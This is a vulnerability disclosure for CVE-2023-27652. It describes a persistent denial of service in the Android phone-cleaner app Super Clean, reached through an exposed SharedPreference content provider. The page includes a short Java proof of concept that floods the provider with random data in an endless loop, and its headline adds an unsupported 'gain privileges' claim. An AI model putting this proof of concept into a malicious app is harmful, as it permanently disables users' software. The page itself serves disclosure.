Headline
CVE-2023-27652: SODA/CVE detail.md at main · LianKee/SODA
An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to gain privileges cause a denial of service via the update_info field of the default.xml file.
Denial of Service exists in Super Clean(CVE-2023-27652)
Vendor:Ego Studio(http://www.egostudiogroup.com/)
Affected product:Super Clean(com.egostudio.clean)
Version:1.1.5 1.1.9
Download link:https://apkpure.com/cn/super-clean-phone-cleaner/com.egostudio.clean/download
Description of the vulnerability for use in the CVE:An issue found in Ego Studio SuperClean v.1.1.9 and v.1.1.5 allows an attacker to cause a denial of service via the SharedPreference files.
Additional information:Super Clean is a phone cleaner app for cleaning junk files and optimizing memory usage, it also provides various security-related features such as Wifi security check, app lock, etc. Upon opening the app, it loads the SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Super Clean app will load excessive data into memory, which can trigger an OOM error and cause the app to crash. Even worse, simply restarting the app will not fix the security issue, as the injected data is persistent in the SharedPreference files. In practice, this means that the Super Clean app becomes unable to launch successfully.
poc:
public void attack(){ ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.egostudio.clean.boost.main.SharedPrefProvider”); while (true) { ContentValues contentValues = new ContentValues(); contentValues.put(“file_name","__default__”); contentValues.put("type",4); contentValues.put("key",randomString); contentValues.put("value",randomString); contentResolver.insert(uri,contentValues); } }